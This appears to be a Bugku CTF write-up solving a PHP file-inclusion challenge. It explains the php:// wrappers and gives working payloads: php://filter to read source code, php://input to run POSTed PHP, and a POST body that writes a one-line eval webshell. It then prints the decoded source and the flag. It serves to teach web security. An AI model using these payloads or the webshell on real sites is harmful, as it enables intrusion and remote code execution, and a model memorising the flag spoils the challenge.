0. Open the page and click the "click me? no" link.
The URL bar shows http://114.67.246.176:15077/index.php?file=show.php, so there may be a file inclusion vulnerability.
A short introduction to the php:// protocol:
- Condition: allow_url_fopen may be off or on; allow_url_include only needs to be on for php://input, php://stdin, php://memory and php://temp.
- Action: php:// gives access to the respective input/output (I/O) streams. The ones most used in CTFs are php://filter and php://input: php://filter is used to read source code, php://input to execute PHP code.
- Description: PHP provides a number of miscellaneous input/output (I/O) streams that give access to PHP's own input and output streams, the standard input, output and error descriptors, in-memory and disk-backed temporary file streams, and filters that can be applied to other readable and writable file resources.
  Wrappers and what they do:
  - php://input: a read-only stream giving access to the raw request data. For a POST request this is the POST body; it is not available when enctype="multipart/form-data".
  - php://output: a write-only stream that writes to the output buffer the same way print and echo do.
  - php://fd (>= 5.3.6): direct access to a given file descriptor; php://fd/3, for example, refers to file descriptor 3.
  - php://memory and php://temp (>= 5.1.0): file-like streams for reading and writing temporary data. The only difference between them is that php://memory always keeps the data in memory, while php://temp moves it to a temporary file once the data exceeds a predefined limit (the default is 2MB); the temporary file's location is the one sys_get_temp_dir() returns.
  - php://filter (>= 5.0.0): a meta-wrapper designed to apply filters to a data stream as it is opened. It is very useful with all-in-one file functions such as readfile(), file() and file_get_contents(), where there is otherwise no chance to apply a filter before the stream's content is read.
- php://filter parameters in detail: the parameters are passed as part of the protocol's path, and several parameters can be passed on the same path. They are:
  - resource=<data stream to be filtered>: required; names the data stream you want to filter.
  - read=<read chain filter>: optional; one or more filter names, separated by the pipe character (|).
  - write=<write chain filter>: optional; one or more filter names, separated by the pipe character (|).
  - <filter for both chains>: any filter name not prefixed with read= or write= is applied to the read or write chain as appropriate.
- List of available filters (4 categories). The main filter types are listed here; for details see https://www.php.net/manual/zh/filters.php
  String filters:
  - string.rot13: equivalent to str_rot13(), applies a rot13 transform.
  - string.toupper: equivalent to strtoupper(), converts to upper case.
  - string.tolower: equivalent to strtolower(), converts to lower case.
  - string.strip_tags: equivalent to strip_tags(), removes HTML and PHP tags.
  Conversion filters:
  - convert.base64-encode and convert.base64-decode: equivalent to base64_encode() and base64_decode(), base64 encoding and decoding.
  - convert.quoted-printable-encode and convert.quoted-printable-decode: encoding and decoding between quoted-printable and 8-bit strings.
  Compression filters:
  - zlib.deflate and zlib.inflate: a way to create gzip-compatible data in the local file system, but without the header and trailer information that command-line tools such as gzip generate; only the payload part of the data stream is compressed or decompressed.
  - bzip2.compress and bzip2.decompress: as above, for creating bz2-compatible files in the local file system.
  Encryption filters:
  - mcrypt.*: libmcrypt symmetric encryption algorithms.
  - mdecrypt.*: libmcrypt symmetric decryption algorithms.
- Examples:
- php://filter/read=convert.base64-encode/resource=[filename]
Reads the file's source code (base64 encoding is required for php files): http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
- php://input + [POST DATA]
Executes PHP code: http://127.0.0.1/include.php?file=php://input with the POST body <?php phpinfo(); ?>
If you have write permission, write a one-line webshell:
http://127.0.0.1/include.php?file=php://input with the POST body <?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
-
1. Construct the payload: http://114.67.246.176:15077/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
This returns the source code base64-encoded; base64-decoding it yields the source.
2. base64-decode the result:
<html>
<title>Bugku-web</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:flag{58de618583143b308d6c079b4908ea77}
?>
</html>